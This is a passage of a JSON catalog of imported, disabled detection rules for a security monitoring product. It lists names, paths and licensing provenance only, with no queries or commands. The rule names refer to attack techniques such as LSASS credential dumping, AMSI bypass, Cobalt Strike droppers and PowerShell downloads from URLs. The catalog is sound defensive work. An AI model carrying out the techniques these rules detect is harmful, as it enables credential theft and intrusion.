"chronicle-detection-rules-possible-impacketobfuscation-wmiexec-or-smbexec-utility-via-cmdline", "type": "detection", "name": "possible_impacketobfuscation_wmiexec_or_smbexec_utility_via_cmdline", "description": "possible_impacketobfuscation_wmiexec_or_smbexec_utility_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/possible-impacketobfuscation-wmiexec-or-smbexec-utility-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_impacketobfuscation_wmiexec_or_smbexec_utility_via_cmdline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/security/possible_impacket_obfuscation_wmiexec_or_smbexec_utility__via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-possible-libvlcdll-hijack-via-imageload", "type": "detection", "name": "possible_libvlcdll_hijack_via_imageload", "description": "possible_libvlcdll_hijack_via_imageload", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-libvlcdll-hijack-via-imageload.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_libvlcdll_hijack_via_imageload", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/image_load/possible_libvlc_dll_hijack__via_imageload.yaral" } }, { "id": "chronicle-detection-rules-possible-malicious-use-of-mshtaexe-detector-sysmon-behavior", "type": "detection", "name": "possible_malicious_use_of_mshtaexe_detector_sysmon_behavior", "description": 
"possible_malicious_use_of_mshtaexe_detector_sysmon_behavior", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-malicious-use-of-mshtaexe-detector-sysmon-behavior.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_malicious_use_of_mshtaexe_detector_sysmon_behavior", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/possible_malicious_use_of_mshta_exe_detector__sysmon_behavior.yaral" } }, { "id": "chronicle-detection-rules-possible-msbuild-abuse-via-cmdline", "type": "detection", "name": "possible_msbuild_abuse_via_cmdline", "description": "possible_msbuild_abuse_via_cmdline", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-msbuild-abuse-via-cmdline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_msbuild_abuse_via_cmdline", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": 
"rules/_deprecated/soc_prime_rules/mixed_other/security/possible_msbuild_abuse__via_cmdline.yaral" } }, { "id": "chronicle-detection-rules-possible-new-cobalt-strike-dropper", "type": "detection", "name": "possible_new_cobalt_strike_dropper", "description": "possible_new_cobalt_strike_dropper", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-new-cobalt-strike-dropper.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_new_cobalt_strike_dropper", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/possible_new_cobalt_strike_dropper.yaral" } }, { "id": "chronicle-detection-rules-possible-nopowershell-execution-executeassembly-via-cobalt-strike", "type": "detection", "name": "possible_nopowershell_execution_executeassembly_via_cobalt_strike", "description": "possible_nopowershell_execution_executeassembly_via_cobalt_strike", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-nopowershell-execution-executeassembly-via-cobalt-strike.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"chronicle/detection-rules", "source_id": "possible_nopowershell_execution_executeassembly_via_cobalt_strike", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/possible__nopowershell__execution__execute_assembly_via_cobalt_strike.yaral" } }, { "id": "chronicle-detection-rules-possible-privilege-escalation-attack-using-dllhostexe", "type": "detection", "name": "possible_privilege_escalation_attack_using_dllhostexe", "description": "possible_privilege_escalation_attack_using_dllhostexe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-privilege-escalation-attack-using-dllhostexe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_privilege_escalation_attack_using_dllhostexe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/process_creation/possible_privilege_escalation_attack_using_dllhost_exe.yaral" } }, { "id": "chronicle-detection-rules-possible-process-enumeration-sysmonwindows-logs", "type": "detection", "name": "possible_process_enumeration_sysmonwindows_logs", "description": "possible_process_enumeration_sysmonwindows_logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], 
"log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-process-enumeration-sysmonwindows-logs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_process_enumeration_sysmonwindows_logs", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/possible_process_enumeration__sysmon_windows_logs.yaral" } }, { "id": "chronicle-detection-rules-possible-ransomware-or-unauthorized-mbr-modifications", "type": "detection", "name": "possible_ransomware_or_unauthorized_mbr_modifications", "description": "possible_ransomware_or_unauthorized_mbr_modifications", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-ransomware-or-unauthorized-mbr-modifications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_ransomware_or_unauthorized_mbr_modifications", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/possible_ransomware_or_unauthorized_mbr_modifications.yaral" } }, { "id": 
"chronicle-detection-rules-possible-shim-database-persistence-via-sdbinstexe", "type": "detection", "name": "possible_shim_database_persistence_via_sdbinstexe", "description": "possible_shim_database_persistence_via_sdbinstexe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-shim-database-persistence-via-sdbinstexe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_shim_database_persistence_via_sdbinstexe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/possible_shim_database_persistence_via_sdbinst_exe.yaral" } }, { "id": "chronicle-detection-rules-possible-spn-enumeration", "type": "detection", "name": "possible_spn_enumeration", "description": "possible_spn_enumeration", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-spn-enumeration.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_spn_enumeration", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 
"https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/possible_spn_enumeration.yaral" } }, { "id": "chronicle-detection-rules-possible-system-network-configuration-discovery-sysmonwindows-logs", "type": "detection", "name": "possible_system_network_configuration_discovery_sysmonwindows_logs", "description": "possible_system_network_configuration_discovery_sysmonwindows_logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-system-network-configuration-discovery-sysmonwindows-logs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_system_network_configuration_discovery_sysmonwindows_logs", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/possible_system_network_configuration_discovery__sysmon_windows_logs.yaral" } }, { "id": "chronicle-detection-rules-possible-system-network-connections-discovery-sysmonwindows-logs", "type": "detection", "name": "possible_system_network_connections_discovery_sysmonwindows_logs", "description": "possible_system_network_connections_discovery_sysmonwindows_logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": 
"chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-system-network-connections-discovery-sysmonwindows-logs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_system_network_connections_discovery_sysmonwindows_logs", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/possible_system_network_connections_discovery__sysmon_windows_logs.yaral" } }, { "id": "chronicle-detection-rules-possible-system-owneruser-discovery-sysmonwindows-logs", "type": "detection", "name": "possible_system_owneruser_discovery_sysmonwindows_logs", "description": "possible_system_owneruser_discovery_sysmonwindows_logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-system-owneruser-discovery-sysmonwindows-logs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_system_owneruser_discovery_sysmonwindows_logs", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/possible_system_owner_user_discovery__sysmon_windows_logs.yaral" } }, { "id": 
"chronicle-detection-rules-possible-system-time-discovery-sysmonwindows-logs", "type": "detection", "name": "possible_system_time_discovery_sysmonwindows_logs", "description": "possible_system_time_discovery_sysmonwindows_logs", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-system-time-discovery-sysmonwindows-logs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_system_time_discovery_sysmonwindows_logs", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/possible_system_time_discovery__sysmon_windows_logs.yaral" } }, { "id": "chronicle-detection-rules-possible-usage-of-physmem2profit-for-lsass-dump", "type": "detection", "name": "possible_usage_of_physmem2profit_for_lsass_dump", "description": "possible_usage_of_physmem2profit_for_lsass_dump", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/possible-usage-of-physmem2profit-for-lsass-dump.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "possible_usage_of_physmem2profit_for_lsass_dump", 
"source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/sysmon/possible_usage_of_physmem2profit_for_lsass_dump.yaral" } }, { "id": "chronicle-detection-rules-potential-cred-dumping-via-lsass-silentprocessexit-technique", "type": "detection", "name": "potential_cred_dumping_via_lsass_silentprocessexit_technique", "description": "potential_cred_dumping_via_lsass_silentprocessexit_technique", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/potential-cred-dumping-via-lsass-silentprocessexit-technique.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "potential_cred_dumping_via_lsass_silentprocessexit_technique", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/potential_cred_dumping_via_lsass_silentprocessexit_technique.yaral" } }, { "id": "chronicle-detection-rules-potential-credential-dumping-activity-via-lsass", "type": "detection", "name": "potential_credential_dumping_activity_via_lsass", "description": "potential_credential_dumping_activity_via_lsass", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", 
"enabled": false, "path": "detections/chronicle-imports/_quarantine/potential-credential-dumping-activity-via-lsass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "potential_credential_dumping_activity_via_lsass", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/potential_credential_dumping_activity_via_lsass.yaral" } }, { "id": "chronicle-detection-rules-potential-lsass-process-dump-via-procdump", "type": "detection", "name": "potential_lsass_process_dump_via_procdump", "description": "potential_lsass_process_dump_via_procdump", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/potential-lsass-process-dump-via-procdump.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "potential_lsass_process_dump_via_procdump", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/potential_lsass_process_dump_via_procdump.yaral" } }, { "id": "chronicle-detection-rules-potential-rdp-exploit-cve20190708", "type": "detection", "name": "potential_rdp_exploit_cve20190708", "description": "potential_rdp_exploit_cve20190708", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", 
"category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/potential-rdp-exploit-cve20190708.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "potential_rdp_exploit_cve20190708", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/proactive_exploit_detection/system/potential_rdp_exploit_cve_2019_0708.yaral" } }, { "id": "chronicle-detection-rules-potential-remote-powershell-session-initiated", "type": "detection", "name": "potential_remote_powershell_session_initiated", "description": "potential_remote_powershell_session_initiated", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/potential-remote-powershell-session-initiated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "potential_remote_powershell_session_initiated", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/potential_remote_powershell_session_initiated.yaral" } }, { "id": "chronicle-detection-rules-potential-solarwinds-mimicking-via-proxy", "type": "detection", 
"name": "potential_solarwinds_mimicking_via_proxy", "description": "potential_solarwinds_mimicking_via_proxy", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/potential-solarwinds-mimicking-via-proxy.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "potential_solarwinds_mimicking_via_proxy", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/proxy/potential_solarwinds_mimicking__via_proxy.yaral" } }, { "id": "chronicle-detection-rules-potential-suspicious-activity-using-secedit", "type": "detection", "name": "potential_suspicious_activity_using_secedit", "description": "potential_suspicious_activity_using_secedit", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/potential-suspicious-activity-using-secedit.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "potential_suspicious_activity_using_secedit", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", 
"upstream_path": "rules/community/microsoft/windows/potential_suspicious_activity_using_secedit.yaral" } }, { "id": "chronicle-detection-rules-potential-tampering-with-rdp-related-registry-keys-via-reg-exe", "type": "detection", "name": "potential_tampering_with_rdp_related_registry_keys_via_reg_exe", "description": "potential_tampering_with_rdp_related_registry_keys_via_reg_exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/potential-tampering-with-rdp-related-registry-keys-via-reg-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "potential_tampering_with_rdp_related_registry_keys_via_reg_exe", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/community/microsoft/windows/potential_tampering_with_rdp_related_registry_keys_via_reg_exe.yaral" } }, { "id": "chronicle-detection-rules-powershell-amsi-bypass-via-net-reflection", "type": "detection", "name": "powershell_amsi_bypass_via_net_reflection", "description": "powershell_amsi_bypass_via_net_reflection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/powershell-amsi-bypass-via-net-reflection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable 
by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_amsi_bypass_via_net_reflection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/powershell_amsi_bypass_via__net_reflection.yaral" } }, { "id": "chronicle-detection-rules-powershell-base64-encoded-shellcode", "type": "detection", "name": "powershell_base64_encoded_shellcode", "description": "powershell_base64_encoded_shellcode", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/powershell-base64-encoded-shellcode.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_base64_encoded_shellcode", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/powershell_base64_encoded_shellcode.yaral" } }, { "id": "chronicle-detection-rules-powershell-dll-attacks-detection", "type": "detection", "name": "powershell_dll_attacks_detection", "description": "powershell_dll_attacks_detection", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": 
"detections/chronicle-imports/_quarantine/powershell-dll-attacks-detection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_dll_attacks_detection", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/windows/powershell_dll_attacks_detection.yaral" } }, { "id": "chronicle-detection-rules-powershell-download-from-url", "type": "detection", "name": "powershell_download_from_url", "description": "powershell_download_from_url", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/powershell-download-from-url.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_download_from_url", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/powershell_download_from_url.yaral" } }, { "id": "chronicle-detection-rules-powershell-download-sysmon", "type": "detection", "name": "powershell_download_sysmon", "description": "powershell_download_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, 
"source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/powershell-download-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_download_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/powershell_download__sysmon.yaral" } }, { "id": "chronicle-detection-rules-powershell-downloadfile", "type": "detection", "name": "powershell_downloadfile", "description": "powershell_downloadfile", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/powershell-downloadfile.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_downloadfile", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/threat_hunting/process_creation/powershell_downloadfile.yaral" } }, { "id": "chronicle-detection-rules-powershell-encoded-command-sysmon", "type": "detection", "name": "powershell_encoded_command_sysmon", "description": "powershell_encoded_command_sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], 
"log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/powershell-encoded-command-sysmon.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_encoded_command_sysmon", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": "https://github.com/chronicle/detection-rules/blob/main/LICENSE", "imported_at": "2026-05-04", "upstream_path": "rules/_deprecated/soc_prime_rules/ioc_sigma/windows/powershell_encoded_command__sysmon.yaral" } }, { "id": "chronicle-detection-rules-powershell-loaded-via-dll", "type": "detection", "name": "powershell_loaded_via_dll", "description": "powershell_loaded_via_dll", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "chronicle-detection-rules", "tier": "imported", "enabled": false, "path": "detections/chronicle-imports/_quarantine/powershell-loaded-via-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "chronicle/detection-rules", "source_id": "powershell_loaded_via_dll", "source_commit": "74dd490", "license": "Apache-2.0", "license_url": 